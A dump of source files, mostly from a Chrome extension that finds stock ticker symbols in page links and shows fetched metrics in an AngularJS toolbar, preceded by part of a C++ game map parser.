std::string errorMessage = "Map is missing some tiles: " + previousID;
throw(std::runtime_error(errorMessage.c_str()));
}
XMLElement* background = map->FirstChildElement("background");
if (background)
battlefield->setBackgroundName(background->GetText());
else
battlefield->setBackgroundName(standardBackground);
XMLElement* music = map->FirstChildElement("music");
if (music)
battlefield->setMusicName(music->GetText());
else
battlefield->setMusicName(standardMusic);
return battlefield;
}
void BattlefieldProvider::parseRow(tinyxml2::XMLElement* row, RowPosition rowPosition, BattleFieldFactory& factory) const {
XMLElement* tile = row->FirstChildElement("tile");
XMLElement* ownerNode;
XMLElement* typeNode;
int x = 0, y = 0;
if (rowPosition == RowPosition::MID)
y = 1;
else if (rowPosition == RowPosition::BACK)
y = 2;
Owner owner;
TileType type;
while (tile) {
ownerNode = tile->FirstChildElement("owner");
typeNode = tile->FirstChildElement("type");
if (!ownerNode || !typeNode)
throw(std::runtime_error("Tile is missing owner or type"));
owner = ownerFromString(ownerNode->GetText());
type = typeFromString(typeNode->GetText());
BattleTile battleTile(Coordinate(x, y), owner, type);
factory.supplyNextTile(battleTile);
++x;
tile = tile->NextSiblingElement("tile");
}
}
void BattlefieldProvider::placeObjectsOnBattlefield(BattleField* battlefield, MegamanData* data, tinyxml2::XMLElement* objectNode) const {
if (!battlefield || !objectNode || !data) {
std::string errorMessage = "Invalid object parameters provided during construction\n";
cocos2d::log(errorMessage.c_str());
return;
}
EnemyType type;
XMLElement* nameNode = nullptr;
XMLElement* coordinateNode = nullptr;
XMLElement* object = objectNode->FirstChildElement("object");
int x, y;
Coordinate position;
Owner owner;
while (object) {
nameNode = object->FirstChildElement("name");
type = enemyTypeFromString(nameNode->GetText());
coordinateNode = object->FirstChildElement("x");
coordinateNode->QueryIntText(&x);
coordinateNode = object->FirstChildElement("y");
coordinateNode->QueryIntText(&y);
position = Coordinate(x, y);
auto tile = battlefield->getTileAtCoordinate(position);
owner = tile->getOwner();
if (type == EnemyType::MEGAMAN) {
new Megaman(data, battlefield, position, owner);
}
else {
Actor::createActor(type, battlefield, position, owner);
}
object = object->NextSiblingElement("object");
}
}
|
c5bce8f5377339ec8e1ed574ae2f2b33d5c2cd2b
|
[
"C++"
] | 4
|
C++
|
michaelconnor1996/michaelconnor1996.github.io
|
cdc4f4556db90b099f31b66cfab2f58362200788
|
749ebd7396730ba32dd92e5106811b5390e5e62a
|
refs/heads/master
|
<repo_name>BrettBiba/chrome-stock-ticker<file_sep>/content/find-symbols.js
/**
* @file
*/
var initChromeStockTicker = function() {
var markup = '<div id="chromeStockTicker">';
var markup = markup + ' <cst-bootstrap></cst-bootstrap>';
var markup = markup + '</div>';
$('body').append(markup);
var element = $('#chromeStockTicker');
angular.bootstrap(element, ['chromeStockTicker']);
};
/**
* Load a JS library; if it does not already exist in content context.
*
* All js files must be included in the manifest's web_accessible_resources.
*
* @param string file
* Name of the local javascript file to load.
* @param array regex
* (optional) An array of Regular expression objects. If present will only
* load file if the content page does not have a script element with a src
* attribute that matches regex pattern. If ommited then the file will
* always be loaded.
*
* @return null;
*/
var cstLoadJS = function(file, regex) {
var load = function(file) {
$.get(chrome.extension.getURL(file), {}, function(data) {
try {
eval(data);
} catch (err) {
console.log("Error while trying to evaluate " + file + " (" + err + ")");
}
});
}
var found = false;
if (typeof(regex) != 'undefined') {
for (var i in regex) {
$('script').each(function(index, element) {
var src = $(element).attr('src');
if (src && src.match(regex[i])) {
found = true;
return false;
}
});
if (found)
break;
}
if (found)
console.log(file + " Is already present!");
if (!found)
load(file);
} else {
load(file);
}
}
/**
* Load all JS libraries.
*
* It is neccesary to dynamically load all libraries rather than specifying
* them to auto load in the manifest file. Certail libraries should only be
* loaded conditionally, if they do not already exist in the content context.
* Double loading these libraries will break the content page, which is the
* last thing we want to do. Better to break our extension in these cases.
*
* The JS is isolated between contexs (content and tab(extension)), but the
* DOM is shared. Any libraries that automatically operate on the DOM will
* cause difficulty when loaded twice and working with a shared DOM.
*
* @return null;
*/
var cstLoadAllJS = function() {
var conditionalJs = [
{ file: "libs/external/bootstrap/bootstrap-3.0.3/dist/js/bootstrap.min.js", regex: [ /bootstrap(?:\.min)?\.js/ ] }
];
var alwaysJs = [
"libs/external/angular/angular.min.js",
"libs/external/bower_components/angular-ui-utils/ui-utils.min.js",
"libs/CSTResource.js",
"js/cstApp.js",
"js/resource/resourceFactory.js",
"js/resource/resourceDirective.js",
"js/resource/resourceCtrl.js",
"js/links/linksFactory.js",
"js/links/linksCtrl.js",
"js/links/linksDirective.js",
"js/pattern/patternFactory.js",
"js/pattern/patternDirective.js",
"js/pattern/patternCtrl.js",
"js/variable/variableFactory.js",
"js/variable/variableCtrl.js",
"js/variable/variableDirective.js",
"js/bar/barCtrl.js",
"js/bar/barDirective.js",
"js/bootstrap/bootstrapDirective.js",
"js/bootstrap/bootstrapCtrl.js"
];
// Ensure that we load this in the correct order.
$.ajaxSetup({async:false});
for (var i in conditionalJs)
cstLoadJS(conditionalJs[i].file, conditionalJs[i].regex);
for (var i in alwaysJs)
cstLoadJS(alwaysJs[i]);
$.ajaxSetup({async:true});
}
/**
* Listen for any messages from the background page, or other content scripts.
*/
chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) {
if (request.command == "cst_show_ticker_bar") {
showBar();
setTimeout(function() {
$('div.cst-bar-add input').focus();
}, 500);
}
});
$('document').ready(function() {
cstLoadAllJS();
initChromeStockTicker();
});
<file_sep>/popup/popup.js
$(document).ready(function() {
$('div#advanced a').click(function() {
chrome.tabs.create({url: "options/options.html"});
});
});
<file_sep>/js/bootstrap/bootstrapCtrl.js
cstApp.controller('bootstrap', ['$scope', 'variable', 'variableConfig', 'patterns', function($scope, variable, variableConfig, patterns) {
$scope.variables = [];
$scope.display = false;
$scope.$watch('display', function(display) {
if (display) {
$('html').css('position', 'relative');
$('html').css({'margin-top':'30px'});
setTimeout(function() {
$('div.cst-bar-add input').focus();
}, 500);
} else {
$('html').css({'margin-top':'0px'});
}
});
angular.element('body').on('keydown', function(e) {
if ((e.keyCode == 79 && e.shiftKey == true && e.metaKey == true) ||
(e.keyCode == 79 && e.shiftKey == true && e.altKey == true)) {
$scope.display = ($scope.display) ? false : true;
$scope.$apply();
}
});
var findVariables = function(html, patterns) {
var symbols = [];
// Iterate through all 'a' elements.
$(html).find('a').each(function() {
var href = $(this).attr('href');
// If the element has a 'href' attribute.
if (typeof(href) != 'undefined') {
try {
href = decodeURIComponent(href);
for (var i=0; i<patterns.items.length; i++) {
var match;
var regex = new RegExp(patterns.items[i].regex, patterns.items[i].modifiers);
// If the href attribute matches one of our patterns.
while ((match = regex.exec(href)) !== null) {
symbols.push(match[patterns.items[i].result].toUpperCase());
}
}
} catch (err) {
console.log('Can not examine href (' + href + '): ' + err);
}
}
});
// Remove any duplicates.
var symbolsCleaned = [];
$.each(symbols, function(i, el) {
if($.inArray(el, symbolsCleaned) === -1) symbolsCleaned.push(el);
});
return symbolsCleaned;
};
setTimeout(function() {
var variables = findVariables($('html').html(), patterns.getData());
var alwaysDisplay = variableConfig.getData().alwaysDisplay;
if (variables.length || alwaysDisplay) {
$scope.variables = variables;
$scope.display = true;
$scope.$apply();
}
}, 1000);
}]);
<file_sep>/js/resource/resourceDirective.js
cstApp.directive('cstResourceConfig', function() {
return {
restrict: 'E',
controller: 'resourceConfig',
replace: true,
scope: true,
templateUrl: chrome.extension.getURL('/js/resource/template/resource-config.html')
};
});
<file_sep>/js/cstApp.js
cstApp = angular.module('chromeStockTicker', ['ui.utils']);
cstApp.config(function($sceDelegateProvider) {
$sceDelegateProvider.resourceUrlWhitelist([
// Allow same origin resource loads.
'self',
// Allow loading from our assets domain. Notice the difference between * and **.
'chrome-extension://**'
]);
});
cstApp.constant('appMeta', {
version: '0.9.9'
});
<file_sep>/js/resource/resourceFactory.js
cstApp.factory('resource', ['$rootScope', 'appMeta', function($rootScope, appMeta) {
/**
* Private data and methods.
*/
var pvt = {};
/**
* Ensure a resource url object contains only valid properties and values.
*/
pvt.cleanUrl = function(url) {
var cleanUrl = url;
return { success: true, message: null, url: cleanUrl };
}
/**
* Ensure a resource metric object contains only valid properties and values.
*
* If any properties contain invalid data it will be removed. If the removal
* results in an invalid metric then the overall result will be considered
* a failure; the metric is unusable and should be discarded by the calling
* code.
*
* @param object metric
* Describes how to obtain a descrete piece of information (metric) from
* the internet:
* - name: (string) Name that describes this metric.
* - url: (string) Address to retrieve html from.
* - selector: (string) CSS selector to use on html.
* - regex: (string) (optional) Regular expression to run on result of selector.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure to clean otherwise null.
* - metric: (object) will be set on success. The cleaned metric. See
* @param object metric for details.
*/
pvt.cleanMetric = function(metric) {
var name = '';
var url = '';
var selector = '';
var regex = '';
if (typeof(metric) != 'undefined') {
if (typeof(metric.name) == 'string') name = metric.name;
if (typeof(metric.url) == 'string') url = metric.url;
if (typeof(metric.selector) == 'string') selector = metric.selector;
if (typeof(metric.regex) == 'string') regex = metric.regex;
}
cleanMetric = {
name: name,
url: url,
selector: selector,
regex: regex
};
cleanMetric.name = cleanMetric.name.replace(/([^A-Za-z0-9 ]+)/g, '');
if (!cleanMetric.name.length) {
console.log(metric);
return { success: false, message: 'Invalid metric name: ' + metric.name, metric: cleanMetric };
}
if (!cleanMetric.url.length)
return { success: false, message: 'Invalid metric url: ' + metric.name, metric: cleanMetric };
if (!cleanMetric.selector.length)
return { success: false, message: 'Invalid metric selector: ' + metric.name, metric: cleanMetric };
return { success: true, message: null, metric: cleanMetric };
}
/**
* Clean up a resource object, or construct a new one.
*
* @param object resource
* (optional) An existing resource object to clean, such as one loaded
* from chrome storage, or imported via the gui. Properties:
* - loaded: (bool) true if the resource came from storage or other
* code, false if this resource is new.
* - lastSave: (int) last time this resource was saved.
* - lastUpdate: (int) last time updates were checked for.
* - version: (string) application version at the time of last save.
* - autoUpdate: (bool) true if resource should automatically add
* new data found in default data object or/and poll a remote source
* for updates.
* - urls: (array) For future use. This object will store what
* operations may need to be performed before access to a url will
* be granted (such as login). See cleanUrls() for object details.
* - metrics: (array) An array of objects. Each object stores
* information required to access a single piece of information
* on a remote website. See cleanMetric() for object details.
*
* @return object
* An object (report) with properties:
* - success: (bool) true on if resource was clean, false if resource
* required cleaning.
* - message: (string) will be set to the last issue resolved when
* resource requried cleaning.
* - resource: (object) A resource object safe for storage and use,
* even if properties are empty. See @param resource for object
* details.
*/
pvt.cleanResource = function(resource) {
// Default report to return.
var report = { success: true, message: null, resource: null };
// Default empty resource.
var cleanResource = {
loaded: false,
lastSave: 0,
lastUpdate: 0,
version: appMeta.version,
autoUpdate: true,
urls: [],
metrics: []
};
if (typeof(resource) != 'undefined') {
cleanResource.loaded = true;
if (typeof(resource.lastSave) != 'undefined') cleanResource.lastSave = resource.lastSave;
if (typeof(resource.lastUpdate) == 'number') cleanResource.lastUpdate = resource.lastUpdate;
if (typeof(resource.autoUpdate) == 'boolean') cleanResource.autoUpdate = resource.autoUpdate;
if (typeof(resource.version) == 'string') cleanResource.version = resource.version;
// Clean metrics. If in invalid metric is found then disregard it.
if (Object.prototype.toString.call(resource.metrics) === '[object Array]') {
for (i in resource.metrics) {
var result = this.cleanMetric(resource.metrics[i]);
if (result.success) {
cleanResource.metrics.push(result.metric);
} else {
report.success = false;
report.message = result.message;
}
}
}
// Clean urls. If a invalid url is found then disregard it.
if (Object.prototype.toString.call(resource.urls) === '[object Array]') {
for (i in resource.urls) {
var result = this.cleanUrl(resource.urls[i]);
if (result.success) {
cleanResource.urls.push(result.url);
} else {
report.success = false;
report.message = result.message;
}
}
}
}
report.resource = cleanResource;
return report;
}
/**
* Add a new metric to an array of metrics.
*
* @param object metric
* See pvt.cleanMetric for object details.
* @param array metricList
* An array of metric objects. See cleanMetric for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*
* @todo Do not add if a metric with same name already exists.
*/
pvt.addMetric = function(metric, metricList, broadcast) {
var result = this.cleanMetric(metric);
if (result.success) {
metricList.push(result.metric);
if (broadcast) this.broadcastUpdate();
return { success: true, message: null }
}
return result;
};
/**
* Remove a metric from an array of metrics.
*
* @param int index
* The array index of the metric to remove.
* @param array metricList
* An array of metric objects. See cleanMetric for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return void
*
* @todo Add error checking and a normalized return object.
*/
pvt.removeMetric = function(index, metricList, broadcast) {
metricList.splice(index, 1);
if (broadcast) this.broadcastUpdate();
};
/**
* Report any conflicting properties of a potential new metric to an
* existing array of metrics.
*
* @param object metric
* See cleanMetric() for object details.
* @param array metricList
* An array of metric objects. See cleanMetric() for object details.
*
* @result object
* An object (exists) with a property for each property in the metric
* object parameter (i.e: name):
* - name: (array) An array of objects each with the properties:
* - index: (int) The metric items index in the resource where the
* conflict was found.
* - metric: (object) The metric that a property conflict was found on.
*
* Example usage:
* @code
* var result = pvt.compareMetric({ name: 'find this name' });
* // Check if any conflicts on the name were found.
* if (typeof(result['name']) != 'undefined') {
* // Remove the first offending metric in the resource found to be
* // in confict.
* pvt.removeMetric(result['name'][0]['index']);
* }
* @endcode
*/
pvt.compareMetric = function(metric, metricList) {
var exists = {};
for (var key in metric) {
exists[key] = [];
for (var i in metricList) {
if (metric[key] == metricList[i][key]) {
exists[key].push({ index: i, metric: metricList[i] });
}
}
}
return exists;
};
/**
* Add a url to the resource.
*
* @todo Add error checking and a normalized return object.
*/
pvt.addUrl = function(url, broadcast) {
this.data.urls.push(url);
if (broadcast) this.broadcastUpdate();
};
/**
* Remove a url from the resource.
*
* @todo Add error checking and a normalized return object.
*/
pvt.removeUrl = function(index, broadcast) {
this.data.urls.splice(index, 1);
if (broadcast) this.broadcastUpdate();
};
/**
* Sort array of metric objects in alphabetical order based on metric name.
*
* @param array metrics
* An array of metric objects. See pvt.cleanMetric() for object details.
*
* @return array
* The sorted array (sortedMetircs), or empty array on error.
*/
pvt.sortMetrics = function(metrics) {
var sortedMetrics = [];
if (Object.prototype.toString.call(metrics) === '[object Array]') {
for (i in metrics) {
sortedMetrics.push(metrics[i]);
sortedMetrics.sort(function(a, b) {
if (a.name < b.name) {
return -1;
}
return 1;
});
}
}
return sortedMetrics;
};
/**
* Get a simple array of metric name strings.
*
* @return array
* An array (names) of strings, each being a full metric name.
*/
pvt.getMetricNames = function() {
var names = [];
if (typeof(this.data.metrics) != 'undefined') {
for (i in this.data.metrics) {
names.push(this.data.metrics[i].name);
}
}
return names;
};
/**
* Get a copy of the resource object.
*
* @return object
*/
pvt.getData = function() {
return JSON.parse(JSON.stringify(this.data));
};
/**
* Broadcast that the resource was updated.
*
* Controllers may listen for this with:
* $scope.$on('resourceUpdate', function(event, data) {});
*
* @param object data
* An object to broadcast to the rootScope.
* - apply: (bool) true to instruct watchers that they should manually
* resync with $scope.$apply(). This may need to be done if the
* broadcast was originally triggered by chrome.storage methods. This
* is probably a hack; a better solution exists somewhere.
*
* @return void
*/
pvt.broadcastUpdate = function(data) {
if (typeof(data) == 'undefined') {
data = { apply: false };
}
$rootScope.$broadcast('resourceUpdate', data);
};
/**
* Set resource object to a new value.
*
* This will trigger a resource broadcast update.
*
* @param object resource
* see cleanResource() for details.
* @param object broadcastData
* see broadcastUpdate() for object details.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set to the last issue found when
* validating resource.
*/
pvt.setResource = function(resource, broadcastData) {
// Order metrics alphabetically.
resource.metrics = this.sortMetrics(resource.metrics);
// Make sure the resource is constructed properly.
var result = this.cleanResource(resource);
if (result.success) {
this.data = result.resource;
this.broadcastUpdate(broadcastData);
}
return result;
};
/**
* Save resource object to chrome storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.save = function(callback) {
// Remove angular hashes but store result as an object.
var resource = JSON.parse(angular.toJson(this.data));
resource.lastSave = new Date().getTime();
chrome.storage.sync.set( { 'resource': resource } , function() {
if (typeof(callback) != 'undefined') {
if (chrome.runtime.lastError) {
callback({ success: 0, message: chrome.runtime.lastError.message });
} else {
callback({ success: 1, message: null });
}
}
});
};
/**
* Check for any remote updates to the resource and apply if found.
*
* Retrieves the update resource object and merges it with the
* current. Update resource object will overwrite any properties
* in the current resource if there is a collision. The newly merged
* resource object will be written to storage.
*
* @return void
*/
pvt.update = function() {
var time = new Date().getTime();
if (time > (this.data.lastUpdate + (24 * 60 * 60 * 1000))) {
var parent = this;
$.get(chrome.extension.getURL('data/resource.json'), {}, function(data) {
if (typeof(data) != 'undefined') {
var currentResource = parent.getData();
var updateResource = JSON.parse(data);
// Add in any new metrics from the update resource to the
// copy of the current resource.
for (i in updateResource.metrics) {
var result = parent.compareMetric(updateResource.metrics[i], currentResource.metrics);
if (typeof(result['name']) != 'undefined') {
// If a name conflict was found, remove the old metric.
for (j in result['name']) {
parent.removeMetric(result['name'][j]['index'], currentResource.metrics);
}
}
// Append the new metric
var result = parent.addMetric(updateResource.metrics[i], currentResource.metrics);
}
// Put the copy of the current resource metrics (now
// updated) back into the update resource.
updateResource.metrics = currentResource.metrics;
updateResource.lastUpdate = new Date().getTime();
var result = parent.setResource(updateResource, { apply: true } );
if (result.success) {
parent.save(function(result) {
if (result.success) {
console.log('Resource has been updated.');
} else {
console.log('Resource requires update but has failed to to save!');
}
});
} else {
console.log('Resource requires update but could not merge objects.');
}
}
});
}
};
/**
* Reset data object to the default json object file, save results to
* storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
* @param object resetData
* (optional) If provided then this object will be used to reset against
* instead of reading from the default json object file.
*
* @return void
* Callback is invoked when operation is finished with arguments:
* - result: (object) An object with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.reset = function(callback, resetData) {
parent = this;
$.get(chrome.extension.getURL('data/resource.json'), {}, function(data) {
if (typeof(resetData) != 'undefined')
data = resetData;
resetData = parent.cleanData(JSON.parse(data)).data;
var result = parent.setData(resetData, { apply: true } );
if (result.success) {
parent.save(function(result) {
callback(result);
});
}
callback(result);
});
};
// Load an empty resource by default.
pvt.data = pvt.cleanResource().resource;
/**
* Public api.
*/
var api = {};
api.setResource = function(resource, broadcastData) {
return pvt.setResource(resource, broadcastData);
};
api.cleanResource = function() {
return pvt.cleanResource();
};
api.getData = function() {
return pvt.getData();
};
api.getMetricNames = function() {
return pvt.getMetricNames();
};
api.addMetric = function(metric) {
return pvt.addMetric(metric, pvt.data.metrics, true);
};
api.removeMetric = function(index) {
return pvt.removeMetric(index, pvt.data.metrics, true);
};
api.addUrl = function(url) {
return pvt.addUrl(url, true);
};
api.removeUrl = function(index) {
return pvt.removeUrl(index, true);
};
api.save = function(callback) {
return pvt.save(callback);
};
api.reset = function(callback, resetData) {
return pvt.reset(callback, resetData);
};
// When factory is first instantiated pull the resource object out of
// chrome storage. This will result in a broadcast update.
chrome.storage.sync.get(['resource'], function(result) {
if (chrome.runtime.lastError) {
console.log('Could not load resource from chrome storage: ' + chrome.runetime.lastError.message);
} else {
// Clean the resource, ignore any warnings (offenders removed).
var resource = pvt.cleanResource(result['resource']).resource;
var result = api.setResource(resource, { apply: true } );
if (!result.success) {
console.log('Could not apply resource from chrome storage: ' + result.message);
console.log(resource);
} else {
if (resource.autoUpdate) pvt.update();
}
}
});
// Listen for any updates to the resource object in chrome storage. This
// should only happen if multiple browsers are open, or if extension code
// on the other side of the javascript firewall (popup versus options
// versus content) has written a change to storage. This will result in a
// broadcast update.
chrome.storage.onChanged.addListener(function(object, namespace) {
for (key in object) {
if (key == 'resource') {
// Clean the resource, ignore any warnings (offenders removed).
var resource = pvt.cleanResource(object.resource.newValue).resource;
var result = api.setResource(resource, { apply: true } );
if (!result.success) {
console.log('Could not apply resource from chrome storage: ' + result.message);
console.log(resource);
}
}
}
});
return api;
}]);
<file_sep>/js/links/linksCtrl.js
cstApp.controller('linksButton', ['$scope', 'links', function($scope, links) {
// $scope.variable = '';
var replaceVariables = function(itemList) {
for (var i in itemList) {
itemList[i].url = itemList[i].url.replace('SYMBOL', $scope.variable);
}
}
var data = links.getData();
replaceVariables(data.items.custom);
replaceVariables(data.items.default);
$scope.links = data;
$scope.$on('linksUpdate', function(event, data) {
var linksData = links.getData();
replaceVariables(linksData.items.custom);
replaceVariables(linksData.items.default);
$scope.links = linksData;
if (data.apply) $scope.$apply();
});
}]);
cstApp.controller('linksConfig', ['$scope', 'links', function($scope, links) {
// Provide some default patterns.
$scope.links = links.getData();
$scope.export = { pretty: false, data: '' };
$scope.addLink = { name: '', url: '' };
$scope.$on('linksUpdate', function(event, data) {
$scope.links = links.getData();
if (data.apply) $scope.$apply();
});
$scope.add = function() {
var result = links.addItem($scope.addLink);
if (!result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to add link: '+result.message+'</div>');
} else {
$scope.addLink = { name: '', url: '' };
}
};
$scope.remove = function(index) {
links.removeItem(index);
};
$scope.export = function() {
var linksObject = JSON.stringify(links.getData(), null, ($scope.export.pretty * 4));
$scope.export.data = linksObject;
};
$scope.reset = function() {
links.reset(function(result) {
if (result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Reset!</div>');
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to reset: '+result.message+'</div>');
}
});
};
$scope.import = function() {
links.reset(function(result) {
if (result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Imported!</div>');
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to import: '+result.message+'</div>');
}
}, $scope.export.data);
};
$scope.save = function() {
var result = links.setData($scope.links);
if (result.success) {
links.save(function(result) {
if (result.success) {
$('#saveConfirmLinks').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Saved!</div>');
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
});
} else {
$('#saveConfirmLinks').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
};
}]);
<file_sep>/README.md
Chrome Stock Ticker
===================
Chrome extension scans current page for any ticker symbols and if found will display relevant data in the ticker window; such as stock price, free cash flow, historic dividend growth rate, etc...
Please see this original document at https://github.com/delphian/chrome-stock-ticker/wiki or submit an issue to the [Issue Queue](https://github.com/delphian/chrome-stock-ticker/issues/new)
License
-----
Copyright (c) 2013 <NAME> <EMAIL> Released under the MIT license. Read the entire license located in the project root or at http://opensource.org/licenses/mit-license.php
Installation
-----
The easiest way to install is from the chrome web store: [Chrome Stock Ticker](https://chrome.google.com/webstore/detail/stock-ticker-for-chrome/eaghppefmpfgcloppacaehmeiibbboce?hl=en).
```
git clone git@github.com:delphian/chrome-stock-ticker.git
cd chrome-stock-ticker
scripts/install.sh
```
Feel free to contact me <EMAIL> with any questions.
<file_sep>/js/variable/variableFactory.js
/**
* Model to manage variable metrics.
*/
cstApp.factory('variable', ['$rootScope', '$timeout', 'resource', 'appMeta', function($rootScope, $timeout, resource, appMeta) {
/**
* Private data and methods.
*/
var pvt = {
cache: [],
// Record time of last fetch
lastFetch: new Date().getTime(),
// Queue next fetch.
delayFetch: 0
};
/**
* Public api.
*/
var api = {};
/**
* Get variable metrics from cache if they exist.
*
* @param string varName
* Cache key name to query storage against.
* @param function callback
* Callback will be invoked with cache results.
*
* @return void
* Callback will be invoked with arguments:
* - result[cacheKey]: (object|undefined) with properties:
* - timestamp: (int) Time that the cache was set.
* - metrics: (object) An object with metric names as each property.
* If price is a metric property then:
* - price: (object) An object with properties:
* - timestamp: (int) The time that the value was set.
* - value: (mixed) The value of this metric.
*/
api.getCache = function(varName, callback) {
if (typeof(pvt.cache[varName]) != 'undefined') {
if (callback) callback.call(this, pvt.cache[varName]);
} else {
var parent = this;
var cacheKey = 'cache_' + varName;
chrome.storage.local.get([cacheKey], function(result) {
if (typeof(result[cacheKey]) != 'undefined')
result[cacheKey] = JSON.parse(result[cacheKey]);
if (callback) callback.call(parent, result[cacheKey]);
});
}
};
/**
* Remove all cache items from storage.
*
* @param storage
* A storage object. Either chrome.storage.sync or chrome.storage.local
*/
api.removeAllCache = function(storage) {
storage.get(null, function(data) {
if (chrome.runtime.lastError) {
console.log('Failed to retrieve all cache keys to reset.');
} else {
var keys = [];
for (var i in data) {
if (i.match(/^cache_/))
keys.push(i);
}
if (keys.length) {
storage.remove(keys, function() {
if (chrome.runtime.lastError)
console.log('Failed to reset storage.');
});
}
}
});
}
api.setCache = function(varName, metrics) {
// Write cache to local object.
pvt.cache[varName] = {
timestamp: new Date().getTime(),
metrics: metrics
};
// Write cache to google storage.
var data = {};
var cacheKey = 'cache_' + varName;
data[cacheKey] = JSON.stringify(pvt.cache[varName]);
chrome.storage.local.set( data , function() {
if (chrome.runtime.lastError) {
console.log('Failed to save: ' + chrome.runtime.lastError.message);
} else {
console.log('Saved ' + cacheKey + '.');
}
});
};
/**
* @param string varName
* The variable name.
* @param function callback
* A callback function to invoke when results are ready.
*
* @return void
* Invokes callback function with arguments:
* metrics (array)
* An array of metrics keyed by metric name such as:
* ['Price': {timestamp: int, value: mixed}]
*/
api.getMetrics = function(varName, callback) {
var replacements = [
{ from: 'SYMBOL', to: varName }
];
this.getCache(varName, function(cache) {
// Cache for 2 hours.
if ((typeof(cache) != 'undefined') && (cache.timestamp + 2 * 60 * 60 * 1000) > new Date().getTime()) {
console.log('Loading from factory cache ' + varName);
if (callback) callback.call(this, cache.metrics);
} else {
// Slow down multiple requests.
var time = new Date().getTime();
if ((time - 1000) > pvt.lastFetch) {
pvt.delayFetch = 0;
} else {
pvt.delayFetch = (pvt.delayFetch * 1.25) + 500;
}
var parent = this;
var cstResource = new CSTResource(resource.getData());
var localDelay = pvt.delayFetch;
pvt.lastFetch = time;
$timeout(function() {
console.log('Fetching ' + varName + ' @ ' + localDelay);
cstResource.fetchAllMetrics(replacements, function(metrics) {
parent.setCache(varName, metrics);
if (callback) callback.call(parent, metrics);
});
}, localDelay);
}
});
};
return api;
}]);
/**
* Model to manage configuration for displaying variables.
*/
cstApp.factory('variableConfig', ['$rootScope', 'variable', 'resource', 'appMeta', function($rootScope, variable, resource, appMeta) {
/**
* Private data and methods. These are not directly accesible to
* controllers or other factory services.
*/
var pvt = {
data: {
// An array of objects, each defining a metric that should be
// displayed when a variable is rendered. See addItem() for object
// details.
items: []
}
};
/**
* Ensure a metric display item contains only valid properties and values.
*
* @param object item
* Metric to be displayed when a variable is rendered. Valid properties:
* - name: (string) A full name of a resource metric.
* - source: (string) The text to display above the metric.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure to clean otherwise null.
* - item: (object) will be set on success. The cleaned item with
* properties:
* - name: (string) A full name of a resource metric.
* - source: (string) The text to display above the metric.
*/
pvt.cleanItem = function(item) {
cleanItem = {
name: item.name,
source: item.source
};
if (resource.getMetricNames().indexOf(cleanItem.name) == -1)
return { success: false, message: 'Invalid resource metric name: ' + cleanItem.name };
if (!item.source.length)
return { success: false, message: 'Invalid abbreviation text: ' + cleanItem.name };
return { success: true, item: cleanItem };
};
/**
* Add a metric to be displayed when a variable is rendered.
*
* @param object item
* See pvt.cleanItem() for object details.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*/
pvt.addItem = function(item) {
var result = this.cleanItem(item);
if (result.success) {
this.data.items.push(result.item);
return { success: true, message: null };
}
return result;
};
/**
* Clean up the data object, or construct a new one.
*
* @param object data
* (optional) An existing data object to clean, such as one loaded
* from chrome storage, or imported via the gui. Properties:
* - loaded: (bool) true if the data object came from storage or other
* code, false if this data object is new.
* - lastSave: (int) last time this object was saved.
* - lastUpdate: (int) last time updates were checked for.
* - version: (string) application version at the time of last save.
* - autoUpdate: (bool) true if object should automatically add
* new data found in default data object or/and poll a remote source
* for updates.
* - alwaysDisplay: (bool) true if variable bar should always been
* displayed even if no variables detected on page.
* - items: (array) Collection of metric objects to show when
* displaying a variable. See cleanItem() for object details.
*
* @return object
* An object (report) with properties:
* - success: (bool) true on if object was valid, false if object
* required cleaning.
* - message: (string) will be set to the last issue resolved if
* object requried cleaning.
* - data: (object) A links object safe for storage and use,
* even if properties are empty. See @param data for object
* details.
*/
pvt.cleanData = function(data) {
// Default report to return.
var report = { success: true, message: null, data: null };
// Default empty object.
var cleanData = {
loaded: false,
lastSave: 0,
lastUpdate: 0,
version: appMeta.version,
autoUpdate: true,
alwaysDisplay: false,
items: []
};
if (typeof(data) != 'undefined') {
cleanData.loaded = true;
if (typeof(data.lastSave) != 'undefined') cleanData.lastSave = data.lastSave;
if (typeof(data.lastUpdate) == 'number') cleanData.lastUpdate = data.lastUpdate;
if (typeof(data.autoUpdate) == 'boolean') cleanData.autoUpdate = data.autoUpdate;
if (typeof(data.alwaysDisplay) == 'boolean') cleanData.alwaysDisplay = data.alwaysDisplay;
if (typeof(data.version) == 'string') cleanData.version = data.version;
if (typeof(data.items) != 'undefined') {
for (var i in data.items) {
var result = this.cleanItem(data.items[i]);
if (result.success) {
cleanData.items.push(result.item);
} else {
report.success = false;
report.message = result.message;
}
}
}
}
report.data = cleanData;
return report;
};
/**
* Set data object to a new value.
*
* This will trigger a broadcast update.
*
* @param object data
* see cleanData() for object details.
* @param object broadcastData
* see broadcastUpdate() for object details.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
